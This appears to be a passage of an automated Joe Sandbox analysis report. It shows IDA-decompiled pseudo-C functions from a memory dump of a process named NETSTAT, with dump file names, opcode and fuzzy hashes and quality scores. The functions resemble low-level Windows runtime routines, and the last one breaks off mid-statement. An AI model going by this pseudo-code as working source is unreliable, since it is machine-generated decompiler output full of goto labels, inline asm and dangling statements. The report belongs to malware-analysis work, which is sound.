                			E0336EF40(intOrPtr __ecx) {
                				char _v5;
                				char _v6;
                				char _v7;
                				char _v8;
                				signed int _v12;
                				intOrPtr _v16;
                				intOrPtr _v20;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* __ebp;
                				intOrPtr _t58;
                				char _t59;
                				signed char _t69;
                				void* _t73;
                				signed int _t74;
                				char _t79;
                				signed char _t81;
                				signed int _t85;
                				signed int _t87;
                				intOrPtr _t90;
                				signed char* _t91;
                				void* _t92;
                				signed int _t94;
                				void* _t96;
                
                				_t90 = __ecx;
                				_v16 = __ecx;
                				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
                					_t58 =  *((intOrPtr*)(__ecx));
                					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
                						E03359080(_t73, __ecx, __ecx, _t92);
                					}
                				}
                				_t74 = 0;
                				_t96 =  *0x7ffe036a - 1;
                				_v12 = 0;
                				_v7 = 0;
                				if(_t96 > 0) {
                					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
                					_v12 = _t74;
                					_v7 = _t96 != 0;
                				}
                				_t79 = 0;
                				_v8 = 0;
                				_v5 = 0;
                				while(1) {
                					L4:
                					_t59 = 1;
                					L5:
                					while(1) {
                						if(_t59 == 0) {
                							L12:
                							_t21 = _t90 + 4; // 0x77cfc21e
                							_t87 =  *_t21;
                							_v6 = 0;
                							if(_t79 != 0) {
                								if((_t87 & 0x00000002) != 0) {
                									goto L19;
                								}
                								if((_t87 & 0x00000001) != 0) {
                									_v6 = 1;
                									_t74 = _t87 ^ 0x00000003;
                								} else {
                									_t51 = _t87 - 2; // -2
                									_t74 = _t51;
                								}
                								goto L15;
                							} else {
                								if((_t87 & 0x00000001) != 0) {
                									_v6 = 1;
                									_t74 = _t87 ^ 0x00000001;
                								} else {
                									_t26 = _t87 - 4; // -4
                									_t74 = _t26;
                									if((_t74 & 0x00000002) == 0) {
                										_t74 = _t74 - 2;
                									}
                								}
                								L15:
                								if(_t74 == _t87) {
                									L19:
                									E03352D8A(_t74, _t90, _t87, _t90);
                									_t74 = _v12;
                									_v8 = 1;
                									if(_v7 != 0 && _t74 > 0x64) {
                										_t74 = _t74 - 1;
                										_v12 = _t74;
                									}
                									_t79 = _v5;
                									goto L4;
                								}
                								asm("lock cmpxchg [esi], ecx");
                								if(_t87 != _t87) {
                									_t74 = _v12;
                									_t59 = 0;
                									_t79 = _v5;
                									continue;
                								}
                								if(_v6 != 0) {
                									_t74 = _v12;
                									L25:
                									if(_v7 != 0) {
                										if(_t74 < 0x7d0) {
                											if(_v8 == 0) {
                												_t74 = _t74 + 1;
                											}
                										}
                										_t38 = _t90 + 0x14; // 0x0
                										_t39 = _t90 + 0x14; // 0x0
                										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
                										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                											_t85 = _t85 & 0xff000000;
                										}
                										 *(_t90 + 0x14) = _t85;
                									}
                									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                									 *((intOrPtr*)(_t90 + 8)) = 1;
                									return 0;
                								}
                								_v5 = 1;
                								_t87 = _t74;
                								goto L19;
                							}
                						}
                						_t94 = _t74;
                						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
                						if(_t74 == 0) {
                							goto L12;
                						} else {
                							_t91 = _t90 + 4;
                							goto L8;
                							L9:
                							while((_t81 & 0x00000001) != 0) {
                								_t69 = _t81;
                								asm("lock cmpxchg [edi], edx");
                								if(_t69 != _t81) {
                									_t81 = _t69;
                									continue;
                								}
                								_t90 = _v16;
                								goto L25;
                							}
                							asm("pause");
                							_t94 = _t94 - 1;
                							if(_t94 != 0) {
                								L8:
                								_t81 =  *_t91;
                								goto L9;
                							} else {
                								_t90 = _v16;
                								_t79 = _v5;
                								goto L12;
                							}
                						}
                					}
                				}
                			}


                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                • Instruction ID: 6b1f53cb3fbb7724f399761db821b77304ff874a2f9bed1092741c1d06a797f4
                • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                • Instruction Fuzzy Hash: 00512434E04645EFDB10CB68DAC07EEFBB9AF05304F1CC2A8D4559B289C379A989C741
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 84%
                			E0342740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
                				signed short* _v8;
                				intOrPtr _v12;
                				intOrPtr _t55;
                				void* _t56;
                				intOrPtr* _t66;
                				intOrPtr* _t69;
                				void* _t74;
                				intOrPtr* _t78;
                				intOrPtr* _t81;
                				intOrPtr* _t82;
                				intOrPtr _t83;
                				signed short* _t84;
                				intOrPtr _t85;
                				signed int _t87;
                				intOrPtr* _t90;
                				intOrPtr* _t93;
                				intOrPtr* _t94;
                				void* _t98;
                
                				_t84 = __edx;
                				_t80 = __ecx;
                				_push(__ecx);
                				_push(__ecx);
                				_t55 = __ecx;
                				_v8 = __edx;
                				_t87 =  *__edx & 0x0000ffff;
                				_v12 = __ecx;
                				_t3 = _t55 + 0x154; // 0x154
                				_t93 = _t3;
                				_t78 =  *_t93;
                				_t4 = _t87 + 2; // 0x2
                				_t56 = _t4;
                				while(_t78 != _t93) {
                					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
                						L4:
                						_t78 =  *_t78;
                						continue;
                					} else {
                						_t7 = _t78 + 0x18; // 0x18
                						if(E033AD4F0(_t7, _t84[2], _t87) == _t87) {
                							_t40 = _t78 + 0xc; // 0xc
                							_t94 = _t40;
                							_t90 =  *_t94;
                							while(_t90 != _t94) {
                								_t41 = _t90 + 8; // 0x8
                								_t74 = E0339F380(_a4, _t41, 0x10);
                								_t98 = _t98 + 0xc;
                								if(_t74 != 0) {
                									_t90 =  *_t90;
                									continue;
                								}
                								goto L12;
                							}
                							_t82 = L03374620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                							if(_t82 != 0) {
                								_t46 = _t78 + 0xc; // 0xc
                								_t69 = _t46;
                								asm("movsd");
                								asm("movsd");
                								asm("movsd");
                								asm("movsd");
                								_t85 =  *_t69;
                								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                									L20:
                									_t82 = 3;
                									asm("int 0x29");
                								}
                								 *((intOrPtr*)(_t82 + 4)) = _t69;
                								 *_t82 = _t85;
                								 *((intOrPtr*)(_t85 + 4)) = _t82;
                								 *_t69 = _t82;
                								 *(_t78 + 8) =  *(_t78 + 8) + 1;
                								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
                								goto L11;
                							} else {
                								L18:
                								_push(0xe);
                								_pop(0);
                							}
                						} else {
                							_t84 = _v8;
                							_t9 = _t87 + 2; // 0x2
                							_t56 = _t9;
                							goto L4;
                						}
                					}
                					L12:
                					return 0;
                				}
                				_t10 = _t87 + 0x1a; // 0x1a
                				_t78 = L03374620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
                				if(_t78 == 0) {
                					goto L18;
                				} else {
                					_t12 = _t87 + 2; // 0x2
                					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
                					_t16 = _t78 + 0x18; // 0x18
                					E0339F3E0(_t16, _v8[2], _t87);
                					 *((short*)(_t78 + _t87 + 0x18)) = 0;
                					_t19 = _t78 + 0xc; // 0xc
                					_t66 = _t19;
                					 *((intOrPtr*)(_t66 + 4)) = _t66;
                					 *_t66 = _t66;
                					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
                					_t81 = L03374620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                					if(_t81 == 0) {
                						goto L18;
                					} else {
                						_t26 = _t78 + 0xc; // 0xc
                						_t69 = _t26;
                						asm("movsd");
                						asm("movsd");
                						asm("movsd");
                						asm("movsd");
                						_t85 =  *_t69;
                						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                							goto L20;
                						} else {
                							 *((intOrPtr*)(_t81 + 4)) = _t69;
                							 *_t81 = _t85;
                							 *((intOrPtr*)(_t85 + 4)) = _t81;
                							 *_t69 = _t81;
                							_t83 = _v12;
                							 *(_t78 + 8) = 1;
                							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                							_t34 = _t83 + 0x154; // 0x1ba
                							_t69 = _t34;
                							_t85 =  *_t69;
                							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                								goto L20;
                							} else {
                								 *_t78 = _t85;
                								 *((intOrPtr*)(_t78 + 4)) = _t69;
                								 *((intOrPtr*)(_t85 + 4)) = _t78;
                								 *_t69 = _t78;
                								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                							}
                						}
                						goto L11;
                					}
                				}
                				goto L12;
                			}


                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                • Instruction ID: 02c183f9cfe64846c1ede602a9459de0ae8bbca5212bf558d387dbf764bd0e3d
                • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                • Instruction Fuzzy Hash: 33516D71600606EFDB65CF14C480A56FFB9FF49304F59C1AAE908AF212E771E986CB94
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 97%
                			E03382990() {
                				signed int* _t62;
                				signed int _t64;
                				intOrPtr _t66;
                				signed short* _t69;
                				intOrPtr _t76;
                				signed short* _t79;
                				void* _t81;
                				signed int _t82;
                				signed short* _t83;
                				signed int _t87;
                				intOrPtr _t91;
                				void* _t98;
                				signed int _t99;
                				void* _t101;
                				signed int* _t102;
                				void* _t103;
                				void* _t104;
                				void* _t107;
                
                				_push(0x20);
                				_push(0x342ff00);
                				E033AD08C(_t81, _t98, _t101);
                				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
                				_t99 = 0;
                				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
                				_t82 =  *((intOrPtr*)(_t103 + 0x10));
                				if(_t82 == 0) {
                					_t62 = 0xc0000100;
                				} else {
                					 *((intOrPtr*)(_t103 - 4)) = 0;
                					_t102 = 0xc0000100;
                					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
                					_t64 = 4;
                					while(1) {
                						 *(_t103 - 0x24) = _t64;
                						if(_t64 == 0) {
                							break;
                						}
                						_t87 = _t64 * 0xc;
                						 *(_t103 - 0x2c) = _t87;
                						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x3331664));
                						if(_t107 <= 0) {
                							if(_t107 == 0) {
                								_t79 = E0339E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x3331668)), _t82);
                								_t104 = _t104 + 0xc;
                								__eflags = _t79;
                								if(__eflags == 0) {
                									_t102 = E033D51BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x333166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
                									break;
                								} else {
                									_t64 =  *(_t103 - 0x24);
                									goto L5;
                								}
                								goto L13;
                							} else {
                								L5:
                								_t64 = _t64 - 1;
                								continue;
                							}
                						}
                						break;
                					}
                					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                					__eflags = _t102;
                					if(_t102 < 0) {
                						__eflags = _t102 - 0xc0000100;
                						if(_t102 == 0xc0000100) {
                							_t83 =  *((intOrPtr*)(_t103 + 8));
                							__eflags = _t83;
                							if(_t83 != 0) {
                								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
                								__eflags =  *_t83 - _t99;
                								if( *_t83 == _t99) {
                									_t102 = 0xc0000100;
                									goto L19;
                								} else {
                									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
                									_t66 =  *((intOrPtr*)(_t91 + 0x10));
                									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
                									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
                										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
                										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
                											L26:
                											_t102 = E03382AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                											__eflags = _t102 - 0xc0000100;
                											if(_t102 != 0xc0000100) {
                												goto L12;
                											} else {
                												_t99 = 1;
                												_t83 =  *((intOrPtr*)(_t103 - 0x20));
                												goto L18;
                											}
                										} else {
                											_t69 = E03366600( *((intOrPtr*)(_t91 + 0x1c)));
                											__eflags = _t69;
                											if(_t69 != 0) {
                												goto L26;
                											} else {
                												_t83 =  *((intOrPtr*)(_t103 + 8));
                												goto L18;
                											}
                										}
                									} else {
                										L18:
                										_t102 = E03382C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
                										L19:
                										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                										goto L12;
                									}
                								}
                								L28:
                							} else {
                								E0336EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                								 *((intOrPtr*)(_t103 - 4)) = 1;
                								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
                								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
                								_t76 = E03382AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
                								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
                								__eflags = _t76 - 0xc0000100;
                								if(_t76 == 0xc0000100) {
                									 *((intOrPtr*)(_t103 - 0x1c)) = E03382C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
                								}
                								 *((intOrPtr*)(_t103 - 4)) = _t99;
                								E03382ACB();
                							}
                						}
                					}
                					L12:
                					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
                					_t62 = _t102;
                				}
                				L13:
                				return E033AD0D1(_t62);
                				goto L28;
                			}


                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fed7ecd6950a086ee314aa54de8bfbca1213446e0b5b7fc1019a704cc2b3329e
                • Instruction ID: e6fc4e1427b12621f74791ae29980edfc522e7d07a02de88d3f8778658bdd580
                • Opcode Fuzzy Hash: fed7ecd6950a086ee314aa54de8bfbca1213446e0b5b7fc1019a704cc2b3329e
                • Instruction Fuzzy Hash: DD513575A00319DFDF25EF95C880ADEBBB9BF48710F148459E814AB260C7399D52CB90
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 85%
                			E03384BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
                				signed int _v8;
                				short _v20;
                				intOrPtr _v24;
                				intOrPtr _v28;
                				intOrPtr _v32;
                				char _v36;
                				char _v156;
                				short _v158;
                				intOrPtr _v160;
                				char _v164;
                				intOrPtr _v168;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				signed int _t45;
                				intOrPtr _t74;
                				signed char _t77;
                				intOrPtr _t84;
                				char* _t85;
                				void* _t86;
                				intOrPtr _t87;
                				signed short _t88;
                				signed int _t89;
                
                				_t83 = __edx;
                				_v8 =  *0x344d360 ^ _t89;
                				_t45 = _a8 & 0x0000ffff;
                				_v158 = __edx;
                				_v168 = __ecx;
                				if(_t45 == 0) {
                					L22:
                					_t86 = 6;
                					L12:
                					E0335CC50(_t86);
                					L11:
                					return E0339B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
                				}
                				_t77 = _a4;
                				if((_t77 & 0x00000001) != 0) {
                					goto L22;
                				}
                				_t8 = _t77 + 0x34; // 0xdce0ba00
                				if(_t45 !=  *_t8) {
                					goto L22;
                				}
                				_t9 = _t77 + 0x24; // 0x3448504
                				E03372280(_t9, _t9);
                				_t87 = 0x78;
                				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
                				E0339FA60( &_v156, 0, _t87);
                				_t13 = _t77 + 0x30; // 0x3db8
                				_t85 =  &_v156;
                				_v36 =  *_t13;
                				_v28 = _v168;
                				_v32 = 0;
                				_v24 = 0;
                				_v20 = _v158;
                				_v160 = 0;
                				while(1) {
                					_push( &_v164);
                					_push(_t87);
                					_push(_t85);
                					_push(0x18);
                					_push( &_v36);
                					_push(0x1e);
                					_t88 = E0339B0B0();
                					if(_t88 != 0xc0000023) {
                						break;
                					}
                					if(_t85 !=  &_v156) {
                						L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
                					}
                					_t84 = L03374620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
                					_v168 = _v164;
                					if(_t84 == 0) {
                						_t88 = 0xc0000017;
                						goto L19;
                					} else {
                						_t74 = _v160 + 1;
                						_v160 = _t74;
                						if(_t74 >= 0x10) {
                							L19:
                							_t86 = E0335CCC0(_t88);
                							if(_t86 != 0) {
                								L8:
                								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
                								_t30 = _t77 + 0x24; // 0x3448504
                								E0336FFB0(_t77, _t84, _t30);
                								if(_t84 != 0 && _t84 !=  &_v156) {
                									L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
                								}
                								if(_t86 != 0) {
                									goto L12;
                								} else {
                									goto L11;
                								}
                							}
                							L6:
                							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
                							if(_v164 != 0) {
                								_t83 = _t84;
                								E03384F49(_t77, _t84);
                							}
                							goto L8;
                						}
                						_t87 = _v168;
                						continue;
                					}
                				}
                				if(_t88 != 0) {
                					goto L19;
                				}
                				goto L6;
                			}



























                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 837f2510e84cc2712bec5fd00292398a4b976d21c568324a2a4e42de09475c5d
                • Instruction ID: 165293e28c1054ca1b4cca17d551ba5e39a64fae568ba7471369dc650121d872
                • Opcode Fuzzy Hash: 837f2510e84cc2712bec5fd00292398a4b976d21c568324a2a4e42de09475c5d
                • Instruction Fuzzy Hash: DF41A435E40369ABCB30EF65CD81BEAB7B8EF45700F0504A9E908AB641D774DE85CB91
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 78%
                			E03384D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                				signed int _v12;
                				char _v176;
                				char _v177;
                				char _v184;
                				intOrPtr _v192;
                				intOrPtr _v196;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				signed short _t42;
                				char* _t44;
                				intOrPtr _t46;
                				intOrPtr _t50;
                				char* _t57;
                				intOrPtr _t59;
                				intOrPtr _t67;
                				signed int _t69;
                
                				_t64 = __edx;
                				_v12 =  *0x344d360 ^ _t69;
                				_t65 = 0xa0;
                				_v196 = __edx;
                				_v177 = 0;
                				_t67 = __ecx;
                				_v192 = __ecx;
                				E0339FA60( &_v176, 0, 0xa0);
                				_t57 =  &_v176;
                				_t59 = 0xa0;
                				if( *0x3447bc8 != 0) {
                					L3:
                					while(1) {
                						asm("movsd");
                						asm("movsd");
                						asm("movsd");
                						asm("movsd");
                						_t67 = _v192;
                						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
                						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
                						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
                						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
                						_push( &_v184);
                						_push(_t59);
                						_push(_t57);
                						_push(0xa0);
                						_push(_t57);
                						_push(0xf);
                						_t42 = E0339B0B0();
                						if(_t42 != 0xc0000023) {
                							break;
                						}
                						if(_v177 != 0) {
                							L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                						}
                						_v177 = 1;
                						_t44 = L03374620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
                						_t59 = _v184;
                						_t57 = _t44;
                						if(_t57 != 0) {
                							continue;
                						} else {
                							_t42 = 0xc0000017;
                							break;
                						}
                					}
                					if(_t42 != 0) {
                						_t65 = E0335CCC0(_t42);
                						if(_t65 != 0) {
                							L10:
                							if(_v177 != 0) {
                								if(_t57 != 0) {
                									L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                								}
                							}
                							_t46 = _t65;
                							L12:
                							return E0339B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
                						}
                						L7:
                						_t50 = _a4;
                						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
                						if(_t50 != 3) {
                							if(_t50 == 2) {
                								goto L8;
                							}
                							L9:
                							if(E0339F380(_t67 + 0xc, 0x3335138, 0x10) == 0) {
                								 *0x34460d8 = _t67;
                							}
                							goto L10;
                						}
                						L8:
                						_t64 = _t57 + 0x28;
                						E03384F49(_t67, _t57 + 0x28);
                						goto L9;
                					}
                					_t65 = 0;
                					goto L7;
                				}
                				if(E03384E70(0x34486b0, 0x3385690, 0, 0) != 0) {
                					_t46 = E0335CCC0(_t56);
                					goto L12;
                				} else {
                					_t59 = 0xa0;
                					goto L3;
                				}
                			}





















                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 98c75e024e78f0472afd7e38120283bf893fbb7077d56f0b79a9d722dccd3d07
                • Instruction ID: c03aa7e3098a4e18303822906e70dac667a9e3ba0e7da07620e5b8fc5c985b35
                • Opcode Fuzzy Hash: 98c75e024e78f0472afd7e38120283bf893fbb7077d56f0b79a9d722dccd3d07
                • Instruction Fuzzy Hash: 31413675A40318AFEB31EF15CCC0FAAB7A9EF45704F0840AAE8059BA81D774ED44CB91
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 94%
                			E03368A0A(intOrPtr* __ecx, signed int __edx) {
                				signed int _v8;
                				char _v524;
                				signed int _v528;
                				void* _v532;
                				char _v536;
                				char _v540;
                				char _v544;
                				intOrPtr* _v548;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				signed int _t44;
                				void* _t46;
                				void* _t48;
                				signed int _t53;
                				signed int _t55;
                				intOrPtr* _t62;
                				void* _t63;
                				unsigned int _t75;
                				signed int _t79;
                				unsigned int _t81;
                				unsigned int _t83;
                				signed int _t84;
                				void* _t87;
                
                				_t76 = __edx;
                				_v8 =  *0x344d360 ^ _t84;
                				_v536 = 0x200;
                				_t79 = 0;
                				_v548 = __edx;
                				_v544 = 0;
                				_t62 = __ecx;
                				_v540 = 0;
                				_v532 =  &_v524;
                				if(__edx == 0 || __ecx == 0) {
                					L6:
                					return E0339B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
                				} else {
                					_v528 = 0;
                					E0336E9C0(1, __ecx, 0, 0,  &_v528);
                					_t44 = _v528;
                					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
                					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
                					_t46 = 0xa;
                					_t87 = _t81 - _t46;
                					if(_t87 > 0 || _t87 == 0) {
                						 *_v548 = 0x3331180;
                						L5:
                						_t79 = 1;
                						goto L6;
                					} else {
                						_t48 = E03381DB5(_t62,  &_v532,  &_v536);
                						_t76 = _v528;
                						if(_t48 == 0) {
                							L9:
                							E03393C2A(_t81, _t76,  &_v544);
                							 *_v548 = _v544;
                							goto L5;
                						}
                						_t62 = _v532;
                						if(_t62 != 0) {
                							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
                							_t53 =  *_t62;
                							_v528 = _t53;
                							if(_t53 != 0) {
                								_t63 = _t62 + 4;
                								_t55 = _v528;
                								do {
                									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
                										if(E03368999(_t63,  &_v540) == 0) {
                											_t55 = _v528;
                										} else {
                											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
                											_t55 = _v528;
                											if(_t75 >= _t83) {
                												_t83 = _t75;
                											}
                										}
                									}
                									_t63 = _t63 + 0x14;
                									_t55 = _t55 - 1;
                									_v528 = _t55;
                								} while (_t55 != 0);
                								_t62 = _v532;
                							}
                							if(_t62 !=  &_v524) {
                								L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
                							}
                							_t76 = _t83 & 0x0000ffff;
                							_t81 = _t83 >> 0x10;
                						}
                						goto L9;
                					}
                				}
                			}




























                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2427b403de678e19e8c90dea355e05a2729bcce8df50cb97a8e798192b1f46ea
                • Instruction ID: b559ff35675e2554f7c76e936a3942e78e7d70292dccf77c0b871ab3d26ec015
                • Opcode Fuzzy Hash: 2427b403de678e19e8c90dea355e05a2729bcce8df50cb97a8e798192b1f46ea
                • Instruction Fuzzy Hash: 454160B4A4032C9FDB24DF15CCC8AA9B7F8EB48300F1485EAD8199B255E7709E85CF50
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 76%
                			E0341FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
                				char _v8;
                				signed int _v12;
                				signed int _t29;
                				char* _t32;
                				char* _t43;
                				signed int _t80;
                				signed int* _t84;
                
                				_push(__ecx);
                				_push(__ecx);
                				_t56 = __edx;
                				_t84 = __ecx;
                				_t80 = E0341FD4E(__ecx, __edx);
                				_v12 = _t80;
                				if(_t80 != 0) {
                					_t29 =  *__ecx & _t80;
                					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
                					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
                						E03420A13(__ecx, _t80, 0, _a4);
                						_t80 = 1;
                						if(E03377D50() == 0) {
                							_t32 = 0x7ffe0380;
                						} else {
                							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                						}
                						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                							_push(3);
                							L21:
                							E03411608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
                						}
                						goto L22;
                					}
                					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
                						_t80 = E03422B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
